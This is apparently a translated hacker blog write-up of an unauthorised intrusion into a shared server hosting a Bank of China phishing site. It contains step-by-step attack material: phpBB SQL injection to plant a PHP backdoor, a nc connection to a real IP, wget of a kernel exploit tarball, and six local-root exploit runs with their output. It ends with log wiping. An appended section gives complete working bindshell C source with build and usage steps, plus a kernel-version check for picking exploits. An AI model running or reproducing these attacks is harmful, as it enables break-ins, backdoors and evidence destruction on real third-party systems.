Author: Aku
http://www.coolersky.com/
I had not intended to write up this unsuccessful intrusion, but several friends later asked to see it, and since nobody has anything better to trade, the skeleton of it can go out. Beginners may pick up a little experience from it, more experienced people can try further, and I would like to learn something more myself.
On the evening of the 27th I saw a report on Tian Tian Net that the Bank of China had once again run into a cloned phishing site, this time far away in North America. This site's reprint of the report:
http://www.coolersky.com/web/news/2005028014041.asp
I was meant to be sorting out a plan anyway, but since this came up, let's have a look at it. No more preamble, let's begin.
1. Collecting information
Server information:
Apache/1.3.33
PHP/4.3.9
Main page of the site:
http://www.banochi.net/english/index.shtml
Looking at the fake site itself, there was basically nothing to work with; it is probably just a CGI program that records the password and IP. Apart from attacking the server directly, the other option was the usual shared-hosting approach (what Chinese forums call 旁注): get in through a neighbouring site on the same host.
I searched for other sites on the host and analysed several PHP sites for injection, without finding much of use. Then I remembered the phpBB hole, wrote a bit of code to search for viewtopic.php files, and found a phpBB 2.0.10 entry point:
http://www.bits-clsu.org/forum/viewtopic.php?t=1
Afterwards I remembered that a shared-hosting lookup tool can do this search directly; the result is the same.
2. Uploading the backdoor
Using the phpBB hole (see the write-ups "phpBB remote arbitrary SQL injection vulnerability" and "phpBB SQL injection vulnerability analysis"), I uploaded a PHP backdoor.
3. Getting a bindshell
While I was still reading the write-ups, Edward had already got a bindshell going, heh. The basic method:
Upload bindshell.c
gcc -o /tmp/bind bindshell.c
/tmp/bind
Then connect with nc; it is much more convenient to work in a real shell.
nc -vv 216.22.48.72 7758
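What such a bindshell.c looks like, as an added example for this step (the post does not reproduce the file Edward used, so this is not that code): it listens on a port and, for every connection, forks a child whose stdin, stdout and stderr are the socket before it execs /bin/sh. The default port 7758 and the PATH value are taken from the post; the function names are my own.

```c
/* bindshell.c: minimal TCP bind shell. Added example; not the bindshell.c
 * the post uploaded (that file is not reproduced on the page). */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Parse a decimal TCP port; returns 0 for anything malformed or outside 1..65535. */
uint16_t parse_port(const char *s)
{
    char *end;
    long v;

    if (s == NULL || *s == '\0')
        return 0;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < 1 || v > 65535)
        return 0;
    return (uint16_t)v;
}

/* Listening socket on all interfaces. SO_REUSEADDR lets the shell be restarted
 * while the previous connection is still in TIME_WAIT. Returns fd or -1. */
int make_listener(uint16_t port)
{
    struct sockaddr_in sa;
    int fd, one = 1;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 4) < 0) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Point stdin/stdout/stderr at the client socket and replace this process
 * with /bin/sh. Only returns if execve fails. The PATH is the one the post
 * had to export before gcc would find ld. */
void serve_shell(int client)
{
    char *const sh_argv[] = { "/bin/sh", NULL };
    char *const sh_envp[] = { "PATH=/usr/bin:/bin", NULL };

    dup2(client, STDIN_FILENO);
    dup2(client, STDOUT_FILENO);
    dup2(client, STDERR_FILENO);
    if (client > STDERR_FILENO)
        close(client);
    execve("/bin/sh", sh_argv, sh_envp);
    _exit(1);
}

int main(int argc, char **argv)
{
    uint16_t port = parse_port(argc > 1 ? argv[1] : "7758"); /* 7758 as in the post */
    int lfd;

    if (port == 0) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        return 1;
    }
    lfd = make_listener(port);
    if (lfd < 0) {
        perror("listen");
        return 1;
    }
    signal(SIGCHLD, SIG_IGN); /* reap finished shells without waitpid() */
    for (;;) {
        int c = accept(lfd, NULL, NULL);
        if (c < 0)
            continue;
        if (fork() == 0) { /* one shell per connection; parent keeps listening */
            close(lfd);
            serve_shell(c);
        }
        close(c);
    }
}
```

Build and use it exactly as the post does: gcc -o /tmp/bind bindshell.c, then /tmp/bind 7758 on the host and nc -vv <host> 7758 from your side. Note what this leaves on the box: an unauthenticated listener that anyone who port-scans the host can use, and a process tree of bind -> sh that shows up in ps. That is also what to look for when cleaning up, or when hunting for someone else's.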
4. Collecting system information
Once you have a webshell you can read basic things such as passwd and httpd.conf. The absolute path of the fake site turned out to be /home/banochin/public_html/. Seen from the webshell, the site's files were created on 2004-12-15 (server time), and its cgi-bin directory contained the following:

Name            Created              Last modified        Size        Mode
[member]        2005-02-21 21:39:03  2005-02-21 21:39:03              0700
errlog.dat      2005-02-28 00:32:22  2005-02-28 00:32:22  140.186 KB  0600
id.dat          2005-02-24 10:48:35  2005-02-24 10:48:35  1.727 KB    0600
index.htm       2004-12-15 03:19:51  2004-12-15 03:19:51
0.Dat           2005-02-25 00:36:15  2005-02-25 00:36:15  0.170 KB    0600
pwdbak.dat      2004-12-15 03:24:17  2004-12-15 03:19:55  0.516 KB    0600
security.cgi    2004-12-15 03:24:03  2004-12-15 03:20:00  44.363 KB   0700
visemailer.cgi  2004-12-15 03:24:04  2004-12-15 03:20:02  3.554 KB    0700

From this you can see that the last recorded password was dated 25 February. Browsing the directories I also found Bank of China pages in several other languages, but basically all static HTML, clearly dumped straight from the real Bank of China site.
Since we had no write permission on its directory, the next thing to do was escalate privileges. Everything up to this point took about an hour; the escalation that followed ate more than a day and still did not succeed. Depressing!
Kernel information:
uname -r
2.4.20-021stab022.11.777-enterprise
5. Local privilege escalation tests
First extend the environment with export PATH=/usr/bin:$PATH, otherwise gcc fails with "collect2: cannot find `ld'".
(1) Linux kernel Moxa serial driver BSS overflow vulnerability
grsecurity 2.1.0 release / 5 Linux kernel advisories
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
File:
http://grsecurity.net/~spender/exploits_and_patches.tgz
Test:
wget http://grsecurity.net/~spender/exploits_and_patches.tgz
tar -zxvf exploits_and_patches.tgz
cd exploits_and_patches
make alloc=0x100000
------------------------------------------------------------------------
nasm -f elf -dallocate=32482374 mlock-dos.s
make: nasm: Command not found
make: *** [all] Error 127
------------------------------------------------------------------------
Conclusion: nasm is missing, and uploading the rpm does not help either.
(2) Linux kernel uselib() privilege escalation vulnerability
Linux kernel sys_uselib local root vulnerability
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
http://isec.pl/vulnerabilities/isec-0021-uselib.txt
File:
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
Test:
gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108
------------------------------------------------------------------------
elflbl_v108.c: In function `check_vma_flags':
elflbl_v108.c:545: warning: deprecated use of label at end of compound statement
------------------------------------------------------------------------
./elflbl_v108
------------------------------------------------------------------------
[+] child 1 VMAs 0
[+] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf707000
Wait... -Segmentation fault
------------------------------------------------------------------------
gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109
./elflbl_v109
------------------------------------------------------------------------
[+] SLAB cleanup
[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)
sh: line 9: 24080 Killed                  ./elflbl_v109
------------------------------------------------------------------------
(3) Linux kernel local integer overflow and memory disclosure vulnerabilities
Fun with Linux kernel
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
Test:
gcc -o vc vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------
(4) Linux kernel do_mremap VMA limit local privilege escalation vulnerability
Linux kernel do_mremap VMA limit local privilege escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
File:
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
Test:
gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
./mremap_pte
------------------------------------------------------------------------
[+] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: yes exploitable yes
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] FAILED
------------------------------------------------------------------------
(5) Linux kernel kmod/ptrace race condition privilege escalation vulnerability
Linux kmod/ptrace bug - details
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
File:
http://august.v-lo.krakow.pl/~anszom/km3.c
Test:
gcc -o km3 km3.c
./km3
------------------------------------------------------------------------
usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]
-d - use double-ptrace method (to run interactive program)
-b - start bindshell on port 4112
-r - support randomized pids
-c - choose executable to start
-s - single-shot mode - abort if unsuccessful at the first try
------------------------------------------------------------------------
Linux kmod ptrace local root exploit by
=> Simple mode, executing /usr/bin/id >/dev/tty
sizeof(shellcode) = 95
=> Child process started........ failed
------------------------------------------------------------------------
(6) Linux kernel i386 SMP page fault handler privilege escalation vulnerability
Linux kernel i386 SMP page fault handler privilege escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
Test:
gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[+] in thread 1 (pid=5400)
[+] in thread 2 (pid=5401)
[+] rdtsc calibration: 53428
[+] exploiting race, wait...
[-] unable to exploit race in 30s, kernel patched or loading too high.
------------------------------------------------------------------------
None of the local escalation attempts succeeded. Very depressing! While I was testing, the fake site was taken down; the files were still there, but clearly the authorities had acted and got a good result.
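A check worth running before spending a day on exploits, added here as an example and not part of the original post: compare the running kernel's base version with the first mainline release that fixed each bug tried above. The table in the code holds the mainline fix versions from the respective advisories, which the post does not list by identifier (kmod/ptrace CVE-2003-0127 fixed in 2.4.21; do_mremap CVE-2004-0077 fixed in 2.4.25 and 2.6.3; sys_uselib CVE-2004-1235 and the SMP page fault race CVE-2005-0001 both fixed in 2.4.29 and 2.6.11); the Moxa and vc_resize/memory_leak items are left out. The post's own output shows the two caveats: 2.4.20 is below every threshold, yet every exploit failed, because vendor kernels backport fixes without changing the version number, and the "021stab" suffix is the SWsoft Virtuozzo kernel naming (my reading of the string, not something the post says), whose containerised /proc is also the likely reason /proc/slabinfo was "not readable" for elflbl_v109. The struct and function names are mine.

```c
/* kver_check.c: compare a kernel release string with the mainline releases
 * that fixed the local root bugs tried in section 5. Added example, not
 * code from the original post. Fix versions are taken from the
 * corresponding advisories and describe mainline kernels only. */
#include <stdio.h>
#include <string.h>

struct kver { int major, minor, patch; };

/* Parse "2.4.20-021stab022.11.777-enterprise" into {2, 4, 20}; anything
 * after the third number (vendor suffix) is ignored. Returns 1 on success. */
int kver_parse(const char *release, struct kver *out)
{
    if (release == NULL ||
        sscanf(release, "%d.%d.%d", &out->major, &out->minor, &out->patch) != 3)
        return 0;
    return out->major >= 0 && out->minor >= 0 && out->patch >= 0;
}

/* A vendor suffix ("-021stab...", "-EL", ...) means the distributor may have
 * backported fixes without bumping the version. "stab" in particular is the
 * SWsoft Virtuozzo kernel series (an assumption of this example, not stated
 * in the post). */
int has_vendor_suffix(const char *release)
{
    return release != NULL && strchr(release, '-') != NULL;
}

struct fix {
    const char *name;   /* bug and the exploit from the post that targets it */
    int series_minor;   /* 4 for 2.4.x, 6 for 2.6.x */
    int fixed_patch;    /* first 2.<series>.<patch> mainline release with the fix */
};

static const struct fix fixes[] = {
    { "kmod/ptrace race, CVE-2003-0127 (km3)",            4, 21 },
    { "do_mremap VMA limit, CVE-2004-0077 (mremap_pte)",  4, 25 },
    { "do_mremap VMA limit, CVE-2004-0077 (mremap_pte)",  6,  3 },
    { "sys_uselib race, CVE-2004-1235 (elflbl)",          4, 29 },
    { "sys_uselib race, CVE-2004-1235 (elflbl)",          6, 11 },
    { "SMP page fault race, CVE-2005-0001 (smp)",         4, 29 },
    { "SMP page fault race, CVE-2005-0001 (smp)",         6, 11 },
};

/* Count the table entries for this kernel's series whose fix is newer than
 * the running patch level, i.e. bugs a mainline kernel of that version has.
 * Returns -1 if the release cannot be parsed or is not a 2.x kernel. */
int count_upstream_vulns(const char *release, int verbose)
{
    struct kver k;
    size_t i;
    int n = 0;

    if (!kver_parse(release, &k) || k.major != 2)
        return -1;
    for (i = 0; i < sizeof fixes / sizeof fixes[0]; i++) {
        int vuln;
        if (fixes[i].series_minor != k.minor)
            continue;
        vuln = k.patch < fixes[i].fixed_patch;
        n += vuln;
        if (verbose)
            printf("%-50s %-19s (fixed in 2.%d.%d)\n", fixes[i].name,
                   vuln ? "VULNERABLE upstream" : "fixed upstream",
                   fixes[i].series_minor, fixes[i].fixed_patch);
    }
    return n;
}

int main(int argc, char **argv)
{
    /* default: the uname -r output from the post */
    const char *rel = argc > 1 ? argv[1] : "2.4.20-021stab022.11.777-enterprise";
    int n = count_upstream_vulns(rel, 1);

    if (n < 0) {
        fprintf(stderr, "cannot parse kernel release: %s\n", rel);
        return 1;
    }
    printf("%s: %d of %zu table entries apply upstream\n", rel, n,
           sizeof fixes / sizeof fixes[0]);
    if (has_vendor_suffix(rel))
        printf("vendor suffix present: fixes may be backported, so a version "
               "match is a reason to try, not proof the exploit will work\n");
    return 0;
}
```

Run it with the uname -r string as the only argument. For the post's kernel it reports all four entries as vulnerable upstream, which is exactly what mremap_pte printed ("vulnerable: yes") before failing; the vendor-suffix line is the reminder that a version match on a 021stab kernel is where the work starts, not where it ends.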
6. Other
The few Linux keyloggers I know of all need root, and the server is administered over SSH, so a sniffer would probably be a dead end as well. With no further ideas, I cleaned up the exploits and the log files.
The above are the results of my tests. I did not get root, but I have collected the relevant vulnerabilities here and hope they are of some help to everyone. I posted the results in the webmaster group and nobody replied; I don't know whether everyone is just too busy...
I have not edited the vulnerabilities and results in the text; anyone interested can use them directly, but please do not go and make trouble for other sites. I hope everyone understands what I mean!
I have been tossing this around for a long time and there is still a lot to do. I hope nobody will give me a hard time over it, heh.
Finally, thanks to Edward, Lao Hei and several others!
This article may be reproduced freely, but please indicate the source. In particular, neither the whole nor any part of it may be used for any commercial or paid purpose. Thank you!